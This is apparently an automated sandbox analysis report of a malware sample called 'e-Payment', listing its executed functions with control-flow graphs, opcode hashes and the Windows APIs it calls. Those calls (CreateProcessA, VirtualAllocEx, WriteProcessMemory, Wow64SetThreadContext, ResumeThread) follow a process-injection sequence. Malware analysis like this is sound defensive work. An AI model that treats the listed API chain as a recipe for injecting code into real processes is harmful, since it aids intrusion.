20161->20163 20165 23c1c91 CreateProcessA 20164->20165 20167 23c1e53 20165->20167 20168 23c5da0 20169 23c5f2b 20168->20169 20171 23c5dc6 20168->20171 20171->20169 20172 23c1910 20171->20172 20173 23c6020 PostMessageW 20172->20173 20174 23c608c 20173->20174 20174->20171 19946 654668 19947 65467a 19946->19947 19948 654686 19947->19948 19950 654779 19947->19950 19951 65479d 19950->19951 19955 654879 19951->19955 19959 654888 19951->19959 19957 6548af 19955->19957 19956 65498c 19956->19956 19957->19956 19963 6544c4 19957->19963 19961 6548af 19959->19961 19960 65498c 19960->19960 19961->19960 19962 6544c4 CreateActCtxA 19961->19962 19962->19960 19964 655918 CreateActCtxA 19963->19964 19966 6559db 19964->19966

                              Executed Functions

                              Function 023C6C84 Relevance: .4, Instructions: 400COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1408797130.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_23c0000_e-Payment.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c8c3105e406fd2b427afbdae5d6a42ae17e1d1224e8693adc2e0415052c51a55
                              • Instruction ID: 45e6f00900ebf393e4f9f3d0db5ccfda54e3efdb90200558a9ed07a24a477839
                              • Opcode Fuzzy Hash: c8c3105e406fd2b427afbdae5d6a42ae17e1d1224e8693adc2e0415052c51a55
                              • Instruction Fuzzy Hash: CBE198717012048BEB29DBB5C450BAEB7FBAFC8704F20856EE5469B291CB35EC46CB51
                              Function 023C52C5 Relevance: .0, Instructions: 9COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1408797130.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_23c0000_e-Payment.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8aed1c84e18fd8eb630e367760ee1aa05a9fd9d710243a578cb5bc940339a209
                              • Instruction ID: c1d19028c73162519f31810c53cc5649f30483330532a6efadb2229828cda426
                              • Opcode Fuzzy Hash: 8aed1c84e18fd8eb630e367760ee1aa05a9fd9d710243a578cb5bc940339a209
                              • Instruction Fuzzy Hash: F0A0016485D24886C1112E22A8984B5E67C968F142F627549915F728435A78D8048B98
                              Function 0065D031 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • GetCurrentProcess.KERNEL32 ref: 0065D0BE
                              • GetCurrentThread.KERNEL32 ref: 0065D0FB
                              • GetCurrentProcess.KERNEL32 ref: 0065D138
                              • GetCurrentThreadId.KERNEL32 ref: 0065D191
                              Memory Dump Source
                              • Source File: 00000000.00000002.1407866025.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_650000_e-Payment.jbxd
                              Similarity
                              • API ID: Current$ProcessThread
                              • String ID:
                              • API String ID: 2063062207-0
                              • Opcode ID: 64850339e72cb9aed82c10dd4a672196c7721bf6a77ef354f78057f9b4ca2c0d
                              • Instruction ID: 91d95ce723eb8473dbc6da8a04a36dcce2df5644d88f7be41836e68e1356bc3e
                              • Opcode Fuzzy Hash: 64850339e72cb9aed82c10dd4a672196c7721bf6a77ef354f78057f9b4ca2c0d
                              • Instruction Fuzzy Hash: D25154B09006498FEB25DFAAD548BEEBBF2FF88314F20845AE409A7390C7745944CF65
                              Function 0065D040 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • GetCurrentProcess.KERNEL32 ref: 0065D0BE
                              • GetCurrentThread.KERNEL32 ref: 0065D0FB
                              • GetCurrentProcess.KERNEL32 ref: 0065D138
                              • GetCurrentThreadId.KERNEL32 ref: 0065D191
                              Memory Dump Source
                              • Source File: 00000000.00000002.1407866025.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_650000_e-Payment.jbxd
                              Similarity
                              • API ID: Current$ProcessThread
                              • String ID:
                              • API String ID: 2063062207-0
                              • Opcode ID: bbf346684dce369a6086efe3ec5e34e0df409649c1d68ad8a74f27f675fd49f8
                              • Instruction ID: 0d9b11f7e381fb82b416a2b1420e819afaacc0028d3ed13b53ceefde150701ca
                              • Opcode Fuzzy Hash: bbf346684dce369a6086efe3ec5e34e0df409649c1d68ad8a74f27f675fd49f8
                              • Instruction Fuzzy Hash: 755144B09006098FEB25DFAAD548BEEBBF1FF48314F20845AE419A7390D774A944CF65
                              Function 023C1BFD Relevance: 1.7, APIs: 1, Instructions: 246processCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 44 23c1bfd-23c1c9d 46 23c1c9f-23c1ca9 44->46 47 23c1cd6-23c1cf6 44->47 46->47 48 23c1cab-23c1cad 46->48 52 23c1d2f-23c1d5e 47->52 53 23c1cf8-23c1d02 47->53 49 23c1caf-23c1cb9 48->49 50 23c1cd0-23c1cd3 48->50 54 23c1cbd-23c1ccc 49->54 55 23c1cbb 49->55 50->47 63 23c1d97-23c1e51 CreateProcessA 52->63 64 23c1d60-23c1d6a 52->64 53->52 56 23c1d04-23c1d06 53->56 54->54 57 23c1cce 54->57 55->54 58 23c1d08-23c1d12 56->58 59 23c1d29-23c1d2c 56->59 57->50 61 23c1d14 58->61 62 23c1d16-23c1d25 58->62 59->52 61->62 62->62 65 23c1d27 62->65 75 23c1e5a-23c1ee0 63->75 76 23c1e53-23c1e59 63->76 64->63 66 23c1d6c-23c1d6e 64->66 65->59 68 23c1d70-23c1d7a 66->68 69 23c1d91-23c1d94 66->69 70 23c1d7c 68->70 71 23c1d7e-23c1d8d 68->71 69->63 70->71 71->71 73 23c1d8f 71->73 73->69 86 23c1ef0-23c1ef4 75->86 87 23c1ee2-23c1ee6 75->87 76->75 89 23c1f04-23c1f08 86->89 90 23c1ef6-23c1efa 86->90 87->86 88 23c1ee8 87->88 88->86 92 23c1f18-23c1f1c 89->92 93 23c1f0a-23c1f0e 89->93 90->89 91 23c1efc 90->91 91->89 95 23c1f2e-23c1f35 92->95 96 23c1f1e-23c1f24 92->96 93->92 94 23c1f10 93->94 94->92 97 23c1f4c 95->97 98 23c1f37-23c1f46 95->98 96->95 100 23c1f4d 97->100 98->97 100->100
                              APIs
                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 023C1E3E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1408797130.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_23c0000_e-Payment.jbxd
                              Similarity
                              • API ID: CreateProcess
                              • String ID:
                              • API String ID: 963392458-0
                              • Opcode ID: 154ff13d2909b99cddb426a5405db899098678eb00a8be46248fbc147fe45933
                              • Instruction ID: df03511f3309eddcabc0767680ced44cff8c0ffdd317084a355a5843572f269d
                              • Opcode Fuzzy Hash: 154ff13d2909b99cddb426a5405db899098678eb00a8be46248fbc147fe45933
                              • Instruction Fuzzy Hash: 7AA16A71D003198FEB14DF68C8417EEBBB2BF48314F2481AAE859A7281DB749985DF91
                              Function 023C1C08 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 101 23c1c08-23c1c9d 103 23c1c9f-23c1ca9 101->103 104 23c1cd6-23c1cf6 101->104 103->104 105 23c1cab-23c1cad 103->105 109 23c1d2f-23c1d5e 104->109 110 23c1cf8-23c1d02 104->110 106 23c1caf-23c1cb9 105->106 107 23c1cd0-23c1cd3 105->107 111 23c1cbd-23c1ccc 106->111 112 23c1cbb 106->112 107->104 120 23c1d97-23c1e51 CreateProcessA 109->120 121 23c1d60-23c1d6a 109->121 110->109 113 23c1d04-23c1d06 110->113 111->111 114 23c1cce 111->114 112->111 115 23c1d08-23c1d12 113->115 116 23c1d29-23c1d2c 113->116 114->107 118 23c1d14 115->118 119 23c1d16-23c1d25 115->119 116->109 118->119 119->119 122 23c1d27 119->122 132 23c1e5a-23c1ee0 120->132 133 23c1e53-23c1e59 120->133 121->120 123 23c1d6c-23c1d6e 121->123 122->116 125 23c1d70-23c1d7a 123->125 126 23c1d91-23c1d94 123->126 127 23c1d7c 125->127 128 23c1d7e-23c1d8d 125->128 126->120 127->128 128->128 130 23c1d8f 128->130 130->126 143 23c1ef0-23c1ef4 132->143 144 23c1ee2-23c1ee6 132->144 133->132 146 23c1f04-23c1f08 143->146 147 23c1ef6-23c1efa 143->147 144->143 145 23c1ee8 144->145 145->143 149 23c1f18-23c1f1c 146->149 150 23c1f0a-23c1f0e 146->150 147->146 148 23c1efc 147->148 148->146 152 23c1f2e-23c1f35 149->152 153 23c1f1e-23c1f24 149->153 150->149 151 23c1f10 150->151 151->149 154 23c1f4c 152->154 155 23c1f37-23c1f46 152->155 153->152 157 23c1f4d 154->157 155->154 157->157
                              APIs
                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 023C1E3E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1408797130.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_23c0000_e-Payment.jbxd
                              Similarity
                              • API ID: CreateProcess
                              • String ID:
                              • API String ID: 963392458-0
                              • Opcode ID: a5caf2e2457d950e738e4c5a90fbbd910d75d31b20df85931f4efff28c86437c
                              • Instruction ID: 4aee186c2b595a8f82aa2f1923a359d7c8e941c78340ad248801042c1c8e6362
                              • Opcode Fuzzy Hash: a5caf2e2457d950e738e4c5a90fbbd910d75d31b20df85931f4efff28c86437c
                              • Instruction Fuzzy Hash: B0916A71D003198FEB14DF69C8407EEBBB2BF44314F2481AAE848A7281DB749985DF91
                              Function 0065ADA8 Relevance: 1.7, APIs: 1, Instructions: 199COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 158 65ada8-65adb7 159 65ade3-65ade7 158->159 160 65adb9-65adc6 call 65a0cc 158->160 161 65ade9-65adf3 159->161 162 65adfb-65ae3c 159->162 165 65addc 160->165 166 65adc8 160->166 161->162 169 65ae3e-65ae46 162->169 170 65ae49-65ae57 162->170 165->159 213 65adce call 65b031 166->213 214 65adce call 65b040 166->214 169->170 172 65ae59-65ae5e 170->172 173 65ae7b-65ae7d 170->173 171 65add4-65add6 171->165 174 65af18-65afd8 171->174 176 65ae60-65ae67 call 65a0d8 172->176 177 65ae69 172->177 175 65ae80-65ae87 173->175 208 65afe0-65b00b GetModuleHandleW 174->208 209 65afda-65afdd 174->209 180 65ae94-65ae9b 175->180 181 65ae89-65ae91 175->181 179 65ae6b-65ae79 176->179 177->179 179->175 183 65ae9d-65aea5 180->183 184 65aea8-65aeaa call 65a0e8 180->184 181->180 183->184 187 65aeaf-65aeb1 184->187 189 65aeb3-65aebb 187->189 190 65aebe-65aec3 187->190 189->190 191 65aec5-65aecc 190->191 192 65aee1-65aeee 190->192 191->192 194 65aece-65aede call 65a0f8 call 65a108 191->194 199 65af11-65af17 192->199 200 65aef0-65af0e 192->200 194->192 200->199 210 65b014-65b028 208->210 211 65b00d-65b013 208->211 209->208 211->210 213->171 214->171
                              APIs
                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0065AFFE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1407866025.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_650000_e-Payment.jbxd
                              Similarity
                              • API ID: HandleModule
                              • String ID:
                              • API String ID: 4139908857-0
                              • Opcode ID: 6d52aac03182733e74789c9c2570f51c66631e47f6b21b7b57b00d0ef4b983f6
                              • Instruction ID: 2f14a93d320ae660e08e970fd96260da173ef3b345e3babf5831c83117c41238
                              • Opcode Fuzzy Hash: 6d52aac03182733e74789c9c2570f51c66631e47f6b21b7b57b00d0ef4b983f6
                              • Instruction Fuzzy Hash: 00815570A00B058FD724DF69D45579ABBF2BF88305F008A2DD88AD7B40D775E84ACB91
                              Function 0065590C Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 215 65590c-6559d9 CreateActCtxA 217 6559e2-655a3c 215->217 218 6559db-6559e1 215->218 225 655a3e-655a41 217->225 226 655a4b-655a4f 217->226 218->217 225->226 227 655a51-655a5d 226->227 228 655a60 226->228 227->228 230 655a61 228->230 230->230
                              APIs
                              • CreateActCtxA.KERNEL32(?), ref: 006559C9
                              Memory Dump Source
                              • Source File: 00000000.00000002.1407866025.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_650000_e-Payment.jbxd
                              Similarity
                              • API ID: Create
                              • String ID:
                              • API String ID: 2289755597-0
                              • Opcode ID: 5261f2f480b2573e6f8f8c8e5f6561896461426e5cc90e971d3c15e8a1efdc38
                              • Instruction ID: 706681066395315068f021f99289a1f3af4bcda6a3f55b8ecf5ddf4fedba95e7
                              • Opcode Fuzzy Hash: 5261f2f480b2573e6f8f8c8e5f6561896461426e5cc90e971d3c15e8a1efdc38
                              • Instruction Fuzzy Hash: BD41F470C00718CFDB24CFA9C894BDEBBB6BF48304F24815AD409AB251DB75594ACF50
                              Function 006544C4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 231 6544c4-6559d9 CreateActCtxA 234 6559e2-655a3c 231->234 235 6559db-6559e1 231->235 242 655a3e-655a41 234->242 243 655a4b-655a4f 234->243 235->234 242->243 244 655a51-655a5d 243->244 245 655a60 243->245 244->245 247 655a61 245->247 247->247
                              APIs
                              • CreateActCtxA.KERNEL32(?), ref: 006559C9
                              Memory Dump Source
                              • Source File: 00000000.00000002.1407866025.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_650000_e-Payment.jbxd
                              Similarity
                              • API ID: Create
                              • String ID:
                              • API String ID: 2289755597-0
                              • Opcode ID: c80277b62a6f313cce729a5524416de440b3db678e3761286cc859e7da73e19a
                              • Instruction ID: e402eb761ff9686f456bbb0b019d78e5f3689f17429405eabfb9c07a4647760f
                              • Opcode Fuzzy Hash: c80277b62a6f313cce729a5524416de440b3db678e3761286cc859e7da73e19a
                              • Instruction Fuzzy Hash: FF41D270C00719CBDB24DFAAC8447DEBBBABF48304F24816AD409AB251DB75694ACF50
                              Function 023C1578 Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 248 23c1578-23c15ce 250 23c15de-23c161d WriteProcessMemory 248->250 251 23c15d0-23c15dc 248->251 253 23c161f-23c1625 250->253 254 23c1626-23c1656 250->254 251->250 253->254
                              APIs
                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 023C1610
                              Memory Dump Source
                              • Source File: 00000000.00000002.1408797130.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_23c0000_e-Payment.jbxd
                              Similarity
                              • API ID: MemoryProcessWrite
                              • String ID:
                              • API String ID: 3559483778-0
                              • Opcode ID: ae04d86ecedd1899da4d62b81d8f0c102c67c4657ec46ffe0c06e90045fac0b2
                              • Instruction ID: 5a73ef5cdba85de27a52328474d3dcde75149f54bd89d0551912706cab62dd18
                              • Opcode Fuzzy Hash: ae04d86ecedd1899da4d62b81d8f0c102c67c4657ec46ffe0c06e90045fac0b2
                              • Instruction Fuzzy Hash: 8A2135719003499FDF10DFAAC884BEEBBF1FF48310F14842AE959A7281C7789941DBA4
                              Function 023C1580 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 258 23c1580-23c15ce 260 23c15de-23c161d WriteProcessMemory 258->260 261 23c15d0-23c15dc 258->261 263 23c161f-23c1625 260->263 264 23c1626-23c1656 260->264 261->260 263->264
                              APIs
                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 023C1610
                              Memory Dump Source
                              • Source File: 00000000.00000002.1408797130.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_23c0000_e-Payment.jbxd
                              Similarity
                              • API ID: MemoryProcessWrite
                              • String ID:
                              • API String ID: 3559483778-0
                              • Opcode ID: 45be78027f2b3abaf1f72ff33e526c97862e95d4e41a6856d9ff868e9d715986
                              • Instruction ID: 767a2d53db7a9adb33135ef5d17498f2f52c7fb853a420596281bd46cf621981
                              • Opcode Fuzzy Hash: 45be78027f2b3abaf1f72ff33e526c97862e95d4e41a6856d9ff868e9d715986
                              • Instruction Fuzzy Hash: A62155719003099FDB10DFAAC880BEEBBF4FF48310F10842AE959A7241C7789940DBA4
                              Function 023C0FA8 Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 268 23c0fa8-23c0ffb 270 23c0ffd-23c1009 268->270 271 23c100b-23c103b Wow64SetThreadContext 268->271 270->271 273 23c103d-23c1043 271->273 274 23c1044-23c1074 271->274 273->274
                              APIs
                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 023C102E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1408797130.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_23c0000_e-Payment.jbxd
                              Similarity
                              • API ID: ContextThreadWow64
                              • String ID:
                              • API String ID: 983334009-0
                              • Opcode ID: 35897f6c8edbf9d53d98790ba229d29052ef251264272fc8298fa3edcafcb8fe
                              • Instruction ID: 66837f027f7f5eb249d03e99d08fe4fe8ff52d109de71e95827623542835827c
                              • Opcode Fuzzy Hash: 35897f6c8edbf9d53d98790ba229d29052ef251264272fc8298fa3edcafcb8fe
                              • Instruction Fuzzy Hash: 8A2157759003488FDB10DFAAC4857EEBBF0EF48324F14842ED559A7241C7789986CFA4
                              Function 023C1668 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 278 23c1668-23c16fd ReadProcessMemory 281 23c16ff-23c1705 278->281 282 23c1706-23c1736 278->282 281->282
                              APIs
                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 023C16F0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1408797130.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_23c0000_e-Payment.jbxd
                              Similarity
                              • API ID: MemoryProcessRead
                              • String ID:
                              • API String ID: 1726664587-0
                              • Opcode ID: 88bee9d08d5f44a9ddf553a63229a8ed1978fa907f15fd96f587fa953a5aa911
                              • Instruction ID: ca2a0d26868787d9d30f8ef6afab3a1cbdc0fbffaee7ea8c8825abf3d6a18f25
                              • Opcode Fuzzy Hash: 88bee9d08d5f44a9ddf553a63229a8ed1978fa907f15fd96f587fa953a5aa911
                              • Instruction Fuzzy Hash: 932125718003499FDB10DFAAC8807EEBBF1FF48310F10842EE959A7240C7789941CBA0
                              Function 0065D689 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 286 65d689-65d724 DuplicateHandle 287 65d726-65d72c 286->287 288 65d72d-65d74a 286->288 287->288
                              APIs
                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0065D717
                              Memory Dump Source
                              • Source File: 00000000.00000002.1407866025.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_650000_e-Payment.jbxd
                              Similarity
                              • API ID: DuplicateHandle
                              • String ID:
                              • API String ID: 3793708945-0
                              • Opcode ID: 7dd7632d7bab6f6f5b681502b2b92e1629dc940fde12a5ec7549d274ae8805a4
                              • Instruction ID: 3f7f08c30d2186fdb81066e3d44d900c3bf8ed610f892ea2617b14facc01204e
                              • Opcode Fuzzy Hash: 7dd7632d7bab6f6f5b681502b2b92e1629dc940fde12a5ec7549d274ae8805a4
                              • Instruction Fuzzy Hash: 0B21E3B5900248DFDB10CFAAD884AEEBBF5FB48324F14801AE958A3350C374AA45CF65
                              Function 023C1670 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 301 23c1670-23c16fd ReadProcessMemory 304 23c16ff-23c1705 301->304 305 23c1706-23c1736 301->305 304->305
                              APIs
                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 023C16F0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1408797130.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_23c0000_e-Payment.jbxd
                              Similarity
                              • API ID: MemoryProcessRead
                              • String ID:
                              • API String ID: 1726664587-0
                              • Opcode ID: a192ab5f1283915e9a6051ae47831c606c50d3d5a95bf35c803805be344ac098
                              • Instruction ID: 3c2bc03f9c6239e3750077ce15dee7c71c30817c919c0c8fa182fec17077679e
                              • Opcode Fuzzy Hash: a192ab5f1283915e9a6051ae47831c606c50d3d5a95bf35c803805be344ac098
                              • Instruction Fuzzy Hash: EC2114719003499FDB10DFAAC880BEEBBF5FF48310F10842AE959A7240C7789941DBA4
                              Function 023C0FB0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 291 23c0fb0-23c0ffb 293 23c0ffd-23c1009 291->293 294 23c100b-23c103b Wow64SetThreadContext 291->294 293->294 296 23c103d-23c1043 294->296 297 23c1044-23c1074 294->297 296->297
                              APIs
                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 023C102E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1408797130.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_23c0000_e-Payment.jbxd
                              Similarity
                              • API ID: ContextThreadWow64
                              • String ID:
                              • API String ID: 983334009-0
                              • Opcode ID: e0d43943ddb4e21391e79e2b2270d0bc53da34f592a23da1fa12d93d7d9d60d8
                              • Instruction ID: ab962441b5900505a12bbb3dc7eac6b584194cf2cf96bae03f7a2253f59ce471
                              • Opcode Fuzzy Hash: e0d43943ddb4e21391e79e2b2270d0bc53da34f592a23da1fa12d93d7d9d60d8
                              • Instruction Fuzzy Hash: 5A2135719003088FDB10DFAAC4857EEBBF4EF48324F14842ED559A7241C7789945CFA4
                              Function 0065D690 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 309 65d690-65d724 DuplicateHandle 310 65d726-65d72c 309->310 311 65d72d-65d74a 309->311 310->311
                              APIs
                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0065D717
                              Memory Dump Source
                              • Source File: 00000000.00000002.1407866025.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_650000_e-Payment.jbxd
                              Similarity
                              • API ID: DuplicateHandle
                              • String ID:
                              • API String ID: 3793708945-0
                              • Opcode ID: 69821229021d6223fee07402d8a8ed759fde87aaa2ac344e5fa1b332e9363eb1
                              • Instruction ID: c7008e52594f3e39beac4377cdb352cd84c81d291fac9d4cc586cd27656b4669
                              • Opcode Fuzzy Hash: 69821229021d6223fee07402d8a8ed759fde87aaa2ac344e5fa1b332e9363eb1
                              • Instruction Fuzzy Hash: 8421C2B5900248DFDB10CFAAD884ADEFBF9FB48324F14841AE918A7350D374A955CFA5
                              Function 0065A130 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0065B079,00000800,00000000,00000000), ref: 0065B28A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1407866025.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_650000_e-Payment.jbxd
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: dc6c6c53f1e76f183b98bbeba7e302377a297734213e105c6924386a423fbb28
                              • Instruction ID: 24c67d553e1d095fb88bb187447ed56ba33d9647306ff9bf903ae9e929239a05
                              • Opcode Fuzzy Hash: dc6c6c53f1e76f183b98bbeba7e302377a297734213e105c6924386a423fbb28
                              • Instruction Fuzzy Hash: 281129B69003488FDB10CF9AD444BEEFBF5EB48310F10842AE919A7300C375A545CFA5
                              Function 0065B219 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0065B079,00000800,00000000,00000000), ref: 0065B28A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1407866025.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_650000_e-Payment.jbxd
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: aa848328bdbe1b695847f28301a99798c4abe077898d2a56aef877293b5f6992
                              • Instruction ID: b5c0e9a872ea03c5f63f2c5cde79dfb5d77ce98e143508e8db4acfbbd66ddf95
                              • Opcode Fuzzy Hash: aa848328bdbe1b695847f28301a99798c4abe077898d2a56aef877293b5f6992
                              • Instruction Fuzzy Hash: 541126B68003488FDB14CFAAD444BEEFBF5EB88310F10842AD819A7710C3B5A645CFA5
                              Function 023C14B8 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                              Download Yara Rule
                              APIs
                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 023C152E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1408797130.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_23c0000_e-Payment.jbxd
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: aac16b07ff39dd623694969b4fa602165995002944589e8313825dee5eab5262
                              • Instruction ID: cac52b57eefc8cebb547a79b3a69a3d8f040683fde2769a95483caa2bc4d77ed
                              • Opcode Fuzzy Hash: aac16b07ff39dd623694969b4fa602165995002944589e8313825dee5eab5262
                              • Instruction Fuzzy Hash: DB1164729003498FDB20CFAAC844BEFBBF1EF48314F24845AE559A7640C7759941CFA0
                              Function 023C14C0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                              Download Yara Rule
                              APIs
                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 023C152E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1408797130.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_23c0000_e-Payment.jbxd
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: f58878eed64aa97f066f40be0498e9ec8b9f453aed6c49765bc1cde5e515d3a8
                              • Instruction ID: 9e3db06e3f5439b88caa895801a3caaa3756903cb047b4b854d4040bd9c64ad2
                              • Opcode Fuzzy Hash: f58878eed64aa97f066f40be0498e9ec8b9f453aed6c49765bc1cde5e515d3a8
                              • Instruction Fuzzy Hash: FC1134769003489FDB10DFAAC844BEFBBF5EF48324F24841AE559A7250C775A940DFA4
                              Function 023C0EFA Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1408797130.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_23c0000_e-Payment.jbxd
                              Similarity
                              • API ID: ResumeThread
                              • String ID:
                              • API String ID: 947044025-0
                              • Opcode ID: 772ae58263d93f23f989a7035e7ad22bc7242b07b34950895b709846d9b3c804
